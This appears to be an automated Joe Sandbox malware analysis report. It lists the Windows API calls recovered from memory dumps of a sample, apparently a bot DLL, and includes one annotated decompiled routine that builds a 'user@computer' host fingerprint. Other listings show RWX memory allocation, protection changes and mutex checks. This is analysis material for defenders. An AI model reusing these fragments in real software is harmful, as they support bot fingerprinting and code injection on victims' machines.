                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,046E4FFC), ref: 046E373F
                  • Part of subcall function 046E36FE: GetLastError.KERNEL32 ref: 046E3749
                  • Part of subcall function 046E36FE: WaitForSingleObject.KERNEL32(000000C8), ref: 046E376E
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 046E378F
                  • Part of subcall function 046E36FE: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 046E37B7
                  • Part of subcall function 046E36FE: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 046E37CC
                  • Part of subcall function 046E36FE: SetEndOfFile.KERNEL32(00000006), ref: 046E37D9
                  • Part of subcall function 046E36FE: CloseHandle.KERNEL32(00000006), ref: 046E37F1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserWritewcscpy
                • String ID:
                • API String ID: 796380773-0
                • Opcode ID: 2f5ed950f3958694cdccdaf2e18aabcc7a3438253b09a1c55835957e41ffdbf5
                • Instruction ID: 17e7ae8a371c5cfc7dac07b35a3ba9287134240203c83ebc5a7d935c46911312
                • Opcode Fuzzy Hash: 2f5ed950f3958694cdccdaf2e18aabcc7a3438253b09a1c55835957e41ffdbf5
                • Instruction Fuzzy Hash: A1517F71E0120AAFEB04DFA6DD89FAA77F8EB04304F004069E604EB251F775AE45CB51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlenW.KERNEL32(?,046E72E8,04C99A03,00000057), ref: 046E3254
                • lstrlenW.KERNEL32(?,046E72E8,04C99A03,00000057), ref: 046E3265
                • lstrlenW.KERNEL32(?,046E72E8,04C99A03,00000057), ref: 046E3277
                • lstrlenW.KERNEL32(?,046E72E8,04C99A03,00000057), ref: 046E3289
                • lstrlenW.KERNEL32(?,046E72E8,04C99A03,00000057), ref: 046E329B
                • lstrlenW.KERNEL32(?,046E72E8,04C99A03,00000057), ref: 046E32A7
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen
                • String ID:
                • API String ID: 1659193697-0
                • Opcode ID: 091c9e000ed3dafbfc644b91f6a721b099bac027514b940dc7fe08235786fb30
                • Instruction ID: a7bc341f4c434ec194851301c6899e2b044a6f7ac3b9f43d710e3235c8647591
                • Opcode Fuzzy Hash: 091c9e000ed3dafbfc644b91f6a721b099bac027514b940dc7fe08235786fb30
                • Instruction Fuzzy Hash: FB412B71E01209AFCB20DFAAC884A7EB7FABF94204B14886DD955E7311F774E9858B50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046CC9D1: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 046CC9DD
                  • Part of subcall function 046CC9D1: SetLastError.KERNEL32(000000B7,?,046DE569,?,?,00000000,?,?,?), ref: 046CC9EE
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 046DE589
                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 046DE661
                  • Part of subcall function 046D5FA2: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 046D5FBC
                  • Part of subcall function 046D5FA2: CreateWaitableTimerA.KERNEL32(046EE268,00000003,?), ref: 046D5FD9
                  • Part of subcall function 046D5FA2: GetLastError.KERNEL32(?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046D5FEA
                  • Part of subcall function 046D5FA2: GetSystemTimeAsFileTime.KERNEL32(?,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046D602A
                  • Part of subcall function 046D5FA2: SetWaitableTimer.KERNEL32(00000000,046DE5BD,00000000,00000000,00000000,00000000,?,?,046DE5BD,?), ref: 046D6049
                  • Part of subcall function 046D5FA2: HeapFree.KERNEL32(00000000,046DE5BD,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046D605F
                • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 046DE64A
                • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 046DE653
                  • Part of subcall function 046CC9D1: CreateMutexA.KERNEL32(046EE268,00000000,?,?,046DE569,?,?,00000000,?,?,?), ref: 046CCA01
                • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 046DE66E
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                • String ID:
                • API String ID: 1700416623-0
                • Opcode ID: 5948a0eb0204042c74a8bdff8927a10dba7ba6ef03892351c53882ad38bef662
                • Instruction ID: 46501fde5552d132100544e8d40a6f2360ec53f82b33a6146571ece55b0267a4
                • Opcode Fuzzy Hash: 5948a0eb0204042c74a8bdff8927a10dba7ba6ef03892351c53882ad38bef662
                • Instruction Fuzzy Hash: AB316E75B00204ABDB11AF66DC949AEBBF9FF99315B14442AE802DF350F636AC41CB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlImageNtHeader.NTDLL(00000000), ref: 046DA5FA
                  • Part of subcall function 046CE9B0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,046DBCFE), ref: 046CE9D6
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,046C7B94,00000000), ref: 046DA63C
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 046DA68E
                • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,046C7B94,00000000), ref: 046DA6A7
                  • Part of subcall function 046D83BC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 046D83DD
                  • Part of subcall function 046D83BC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,046DA62D,00000000,00000000,00000000,00000001,?,00000000), ref: 046D8420
                • GetLastError.KERNEL32(?,00000000,046C7B94,00000000,?,?,?,?,?,?,?,046C8D64,?), ref: 046DA6DF
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                • String ID:
                • API String ID: 1921436656-0
                • Opcode ID: 00f0efa0f4e5227dddf86afb4362598e1308c03758c1fb4ad85325a8b63f92c5
                • Instruction ID: ca77dc20cfddf7fbaa5450a88e28127441ce36bd12f1575a2996e1b1ac6a65e2
                • Opcode Fuzzy Hash: 00f0efa0f4e5227dddf86afb4362598e1308c03758c1fb4ad85325a8b63f92c5
                • Instruction Fuzzy Hash: 14312C75E04249EFDF11EFA5DD40AAE7BB9EB04750F004069E905AB240F775AE40DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 046E57FC
                • lstrcpy.KERNEL32(00000000,?), ref: 046E5815
                • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 046E5822
                • lstrlen.KERNEL32(046EF3A8,?,?,?,?,?,00000000,00000000,?), ref: 046E5834
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 046E5865
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                • String ID:
                • API String ID: 2734445380-0
                • Opcode ID: d2760bdf6896bb57e57e5c215f7be6f9b6ff05b925684378ace9790283ccd45b
                • Instruction ID: b28998e0336ea18980bacfc275b2e2155847068376ab3eccdb26659dd412b35d
                • Opcode Fuzzy Hash: d2760bdf6896bb57e57e5c215f7be6f9b6ff05b925684378ace9790283ccd45b
                • Instruction Fuzzy Hash: 24315772900219FFDB11DFA6CC88EAB7BF8EB44314F044428F91996240F775AA16DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046D20E3: RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046D20EB
                  • Part of subcall function 046D20E3: RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046D2100
                  • Part of subcall function 046D20E3: InterlockedIncrement.KERNEL32(0000001C), ref: 046D2119
                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 046D3620
                • memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,046DC9D5,?,00000000), ref: 046D3631
                • lstrcmpi.KERNEL32(00000002,?), ref: 046D3677
                • memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,046DC9D5,?,00000000), ref: 046D368B
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,046DC9D5,?,00000000), ref: 046D36D1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                • String ID:
                • API String ID: 733514052-0
                • Opcode ID: 7df9ac8de50bd45b1f5c471a026f905959bd649ed784745bf4ffc9e7822b8113
                • Instruction ID: 413c5ca08910a8c8ef6c462098f4202ed6f703376f192069f4370b6a5bb8080e
                • Opcode Fuzzy Hash: 7df9ac8de50bd45b1f5c471a026f905959bd649ed784745bf4ffc9e7822b8113
                • Instruction Fuzzy Hash: 8431A272E00259BFDB10DFA5DC98A9E7BF8FB04614F140068E905A7300F776AD84CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046DBDF1: lstrlen.KERNEL32(?,00000001,?,00000008,046DD288,?,00000000,00000001,00000000,04C9C088,04C9C088,00000000,046C832B,00000000,?,?), ref: 046DBDFD
                • RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046CD170
                • RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046CD183
                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 046CD194
                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 046CD1FF
                • InterlockedIncrement.KERNEL32(046EE4BC), ref: 046CD216
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                • String ID:
                • API String ID: 3915436794-0
                • Opcode ID: 8fc2df8797cbebae887089fe659db6a0bcb36b2992bfb2414e39a8016c06ab8b
                • Instruction ID: 2082d049f1acb3286e575ce12ad3fd6953da87ea07e450bf0491b859663247d9
                • Opcode Fuzzy Hash: 8fc2df8797cbebae887089fe659db6a0bcb36b2992bfb2414e39a8016c06ab8b
                • Instruction Fuzzy Hash: 04317831A05706DFE721EF59D84493AB7F8FB94325B00492EF99987240F739E819CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			// Decompiled routine: builds the string "<user>@<computer>" as UTF-8 on the heap
                			// (host fingerprint used by the bot); returns the buffer or 0 on failure.
                			E01C13C13() {
                				long _v8;
                				long _v12;
                				int _v16;
                				long _t39;
                				long _t43;
                				signed int _t47;
                				signed int _t52;
                				int _t56;
                				int _t57;
                				char* _t63;
                				short* _t66;
                
                				_v16 = 0;
                				_v8 = 0;
                				// First call with a NULL buffer only queries the required length (in WCHARs).
                				GetUserNameW(0,  &_v8);
                				_t39 = _v8;
                				if(_t39 != 0) {
                					_v12 = _t39;
                					_v8 = 0;
                					// Same length query for the computer name.
                					GetComputerNameW(0,  &_v8);
                					_t43 = _v8;
                					if(_t43 != 0) {
                						// Total characters: user + computer + '@' + terminator.
                						_v12 = _v12 + _t43 + 2;
                						// E01C12114 is the heap-allocation wrapper (RtlAllocateHeap, see APIs below);
                						// the size is multiplied by 4 so the buffer holds both the wide and the UTF-8 copy.
                						_t63 = E01C12114(_v12 + _t43 + 2 << 2);
                						if(_t63 != 0) {
                							_t47 = _v12;
                							// Wide-char staging area starts _v12 WCHARs into the buffer.
                							_t66 = _t63 + _t47 * 2;
                							_v8 = _t47;
                							if(GetUserNameW(_t66,  &_v8) == 0) {
                								L7:
                								// Error path: release the buffer (helper, presumably the heap-free wrapper).
                								E01C12C11(_t63);
                							} else {
                								// Overwrite the user name's terminating NUL with '@' (0x40).
                								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                								_t52 = _v8;
                								_v12 = _v12 - _t52;
                								// Append the computer name directly after the '@'.
                								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                									goto L7;
                								} else {
                									_t56 = _v12 + _v8;
                									_v12 = _t56;
                									// 0xfde9 is CP_UTF8: convert "user@computer" into the start of the same buffer.
                									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t56 + 2, 0, 0);
                									_v8 = _t57;
                									if(_t57 == 0) {
                										goto L7;
                									} else {
                										_t63[_t57] = 0;
                										_v16 = _t63;
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v16;
                			}

                APIs
                • GetUserNameW.ADVAPI32(00000000,?), ref: 01C13C27
                • GetComputerNameW.KERNEL32(00000000,?), ref: 01C13C43
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • GetUserNameW.ADVAPI32(00000000,?), ref: 01C13C7D
                • GetComputerNameW.KERNEL32(?,?), ref: 01C13C9F
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000040,00000000,00000000), ref: 01C13CC2
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                • String ID:
                • API String ID: 3850880919-0
                • Opcode ID: 680e49b5a73222e2df22bbda4245c7a82f1c73e5f5ffdc58a9872518f4c86e22
                • Instruction ID: acec2b4c1a0487dbb2f2fc88114b0d5634f5a60d9adc1ac47d6ba665f21ee8cd
                • Opcode Fuzzy Hash: 680e49b5a73222e2df22bbda4245c7a82f1c73e5f5ffdc58a9872518f4c86e22
                • Instruction Fuzzy Hash: 3021F975A40159FFDB11DFA9C994CEEBBBCFE45208B50416AE602E7204D630DB04EB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D66
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D7F
                  • Part of subcall function 046D0D54: GetCurrentThreadId.KERNEL32 ref: 046D0D8C
                  • Part of subcall function 046D0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D98
                  • Part of subcall function 046D0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0DA6
                  • Part of subcall function 046D0D54: lstrcpy.KERNEL32(00000000), ref: 046D0DC8
                • DeleteFileA.KERNEL32(00000000,000004D2), ref: 046C5D6A
                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 046C5D73
                • GetLastError.KERNEL32 ref: 046C5D7D
                • HeapFree.KERNEL32(00000000,00000000), ref: 046C5E3C
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                • String ID:
                • API String ID: 3543646443-0
                • Opcode ID: efc53d495cb259beae6e176344398632af28a71f26c7c43df45f0f5824c4188a
                • Instruction ID: 583b72ac871f2899db96e1a38b9c5b6f188f2427ca6a8f99a8aaf7ffe9d4097e
                • Opcode Fuzzy Hash: efc53d495cb259beae6e176344398632af28a71f26c7c43df45f0f5824c4188a
                • Instruction Fuzzy Hash: 15214FB2611511AFD310BBA5EC4CE9633DDDF8A314B00105AFA05DB252FA39F904CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046DECAB: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,046DE92B,00000000,74E5F5B0,046D47CC,?,00000001), ref: 046DECB7
                  • Part of subcall function 046DECAB: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 046DECCD
                  • Part of subcall function 046DECAB: _snwprintf.NTDLL ref: 046DECF2
                  • Part of subcall function 046DECAB: CreateFileMappingW.KERNEL32(000000FF,046EE268,00000004,00000000,00001000,?), ref: 046DED0E
                  • Part of subcall function 046DECAB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 046DED20
                  • Part of subcall function 046DECAB: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 046DED58
                • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,046DE92B,00000000,74E5F5B0,046D47CC,?,00000001), ref: 046D9F4F
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D9F58
                • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,046DE92B,00000000,74E5F5B0,046D47CC,?,00000001), ref: 046D9F9F
                • GetLastError.KERNEL32(046D665E,00000000,00000000,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D9FCE
                • CloseHandle.KERNEL32(00000000,046D665E,00000000,00000000,?,?,?,?,?,?,?,046C8D64,?), ref: 046D9FDE
                  • Part of subcall function 046E2531: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,046E523E,?), ref: 046E253D
                  • Part of subcall function 046E2531: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,046E523E,?), ref: 046E2565
                  • Part of subcall function 046E2531: memset.NTDLL ref: 046E2577
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                • String ID:
                • API String ID: 1106445334-0
                • Opcode ID: 64f76e34161ef3bffff590894d0525934fee01a3489a653cb48f39564f9ad45e
                • Instruction ID: ab949236ea2ad633a5e9158f50c1ad5e04fa5d7d7627d8adc5b26f963059b94b
                • Opcode Fuzzy Hash: 64f76e34161ef3bffff590894d0525934fee01a3489a653cb48f39564f9ad45e
                • Instruction Fuzzy Hash: AB2190B1A04304AFEB24EFB6DD05A6A77E8EF04354B051429E90AE7250F736FD05CB64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,046DDB2C,00000000,?,?), ref: 046D682D
                • GetFileSize.KERNEL32(00000000,00000000,?,?,046DDB2C,00000000,?,?,?,?,00000000,046CC692,?,?,?,?), ref: 046D683D
                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,046DDB2C,00000000,?,?,?,?,00000000,046CC692), ref: 046D6869
                • GetLastError.KERNEL32(?,?,046DDB2C,00000000,?,?,?,?,00000000,046CC692,?,?,?,?,00000000,?), ref: 046D688E
                • CloseHandle.KERNEL32(000000FF,?,?,046DDB2C,00000000,?,?,?,?,00000000,046CC692,?,?,?,?,00000000), ref: 046D689F
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$CloseCreateErrorHandleLastReadSize
                • String ID:
                • API String ID: 3577853679-0
                • Opcode ID: 29607df15ca18c449332fbbffd0f698adbbbd10d72e162874ea8f8d5a95fa820
                • Instruction ID: 5d4ad07548b5463d17480136b8385f85200930fb310e0b0054876fd6b3dfc5fa
                • Opcode Fuzzy Hash: 29607df15ca18c449332fbbffd0f698adbbbd10d72e162874ea8f8d5a95fa820
                • Instruction Fuzzy Hash: 4911DA72900219BFEB206F65DC88EAE7B9DEB54354F014539F9159B290F670BD418770
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • StrChrA.SHLWAPI(046C158F,0000002C,00000000,?,00000000,6D3C2A4F,6D3C2A4F,?,046DCB18,?,046C159F,046C158F,00000000,0000000B,?,046C158F), ref: 046DBC51
                • StrRChrA.SHLWAPI(046C158F,00000000,0000002F,?,00000000,6D3C2A4F,6D3C2A4F,?,046DCB18,?,046C159F,046C158F,00000000,0000000B,?,046C158F), ref: 046DBC6A
                • StrTrimA.SHLWAPI(046C158F,?,?,00000000,6D3C2A4F,6D3C2A4F,?,046DCB18,?,046C159F,046C158F,00000000,0000000B,?,046C158F,046C158F), ref: 046DBC92
                • StrTrimA.SHLWAPI(00000000,?,?,00000000,6D3C2A4F,6D3C2A4F,?,046DCB18,?,046C159F,046C158F,00000000,0000000B,?,046C158F,046C158F), ref: 046DBCA1
                • HeapFree.KERNEL32(00000000,046C158F,046C158F,00000000,00000000,?,00000000,6D3C2A4F,6D3C2A4F,?,046DCB18,?,046C159F,046C158F,00000000,0000000B), ref: 046DBCD8
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Trim$FreeHeap
                • String ID:
                • API String ID: 2132463267-0
                • Opcode ID: 86a2957503a6e673caed0e0cf21f65638579f98de7c53178b30c54423b7805b8
                • Instruction ID: 07f03a5be261bae5ee3e1c869fc210c85bf6c15da6192aea1a2de7460c734648
                • Opcode Fuzzy Hash: 86a2957503a6e673caed0e0cf21f65638579f98de7c53178b30c54423b7805b8
                • Instruction Fuzzy Hash: 9111B97660021BBBD7219A5ADC89FA77BECEB54B50F150026F904DB245FBB4FD018B90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,005A95A8,00000000,046C7B94,?,?,?,046CA457,74E05520,?,046DA6F4,00000000,00000000), ref: 046D7834
                • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,046CA457,74E05520,?,046DA6F4,00000000,00000000,?,00000000,046C7B94,00000000), ref: 046D7864
                • RtlEnterCriticalSection.NTDLL(046EE480), ref: 046D7873
                • RtlLeaveCriticalSection.NTDLL(046EE480), ref: 046D7891
                • GetLastError.KERNEL32(?,046CA457,74E05520,?,046DA6F4,00000000,00000000,?,00000000,046C7B94,00000000), ref: 046D78A1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                • String ID:
                • API String ID: 653387826-0
                • Opcode ID: aa5547afb01059a3d90044c5f6789486a4049a4b7919398bbf8fe4c981825b95
                • Instruction ID: fab6caaafdd5a1b8aca1ed7d019466e6bed3db6b9bc61bf630e4915a5a1a8248
                • Opcode Fuzzy Hash: aa5547afb01059a3d90044c5f6789486a4049a4b7919398bbf8fe4c981825b95
                • Instruction Fuzzy Hash: DF21E7B5A00B02EFE711DFA9C985956BBF8FB08304B008569EA56D7750E774FD04CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 046DB212
                • GetLastError.KERNEL32 ref: 046DB235
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 046DB248
                • GetLastError.KERNEL32 ref: 046DB253
                • HeapFree.KERNEL32(00000000,00000000), ref: 046DB29B
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                • String ID:
                • API String ID: 1671499436-0
                • Opcode ID: f0573f18353b715c1bb759460a04dc738838cad252e791c9d8bde3aa26f2e969
                • Instruction ID: e85d8222a71bfbd29db00e0f44d1abbbe3ecb202207ba6e157d8f7f5fda7f004
                • Opcode Fuzzy Hash: f0573f18353b715c1bb759460a04dc738838cad252e791c9d8bde3aa26f2e969
                • Instruction Fuzzy Hash: A121A131900204EBEB209F95DC8CB6E7BB4FB50B18F614418E1529A2A4F779BE85DB20
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(046CB15D,?,?,?,?,00000008,046CB15D,00000000,?), ref: 046CF039
                • memcpy.NTDLL(046CB15D,?,00000009,?,?,?,?,00000008,046CB15D,00000000,?), ref: 046CF05B
                • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 046CF073
                • lstrlenW.KERNEL32(00000000,00000001,046CB15D,?,?,?,?,?,?,?,00000008,046CB15D,00000000,?), ref: 046CF093
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,046CB15D,00000000,?), ref: 046CF0B8
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                • String ID:
                • API String ID: 3065863707-0
                • Opcode ID: f00c483864d2c108072bfc9f70adf76d4956e567d9c83a4b2f4103b9f6c50759
                • Instruction ID: 37dd4615201f13c616be651e63a4f7a9075ea0481ead7a4ad0b5cdba8dab4dd3
                • Opcode Fuzzy Hash: f00c483864d2c108072bfc9f70adf76d4956e567d9c83a4b2f4103b9f6c50759
                • Instruction Fuzzy Hash: 01116635E40208BBDB11DB95D808FDE7BB9EB48710F004455F949E7280F679DA48CB64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrcmpi.KERNEL32(00000000,?), ref: 046CE72E
                • RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046CE73B
                • RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046CE74E
                • lstrcmpi.KERNEL32(046EE4C0,00000000), ref: 046CE76E
                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046CC02E,00000000), ref: 046CE782
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                • String ID:
                • API String ID: 1266740956-0
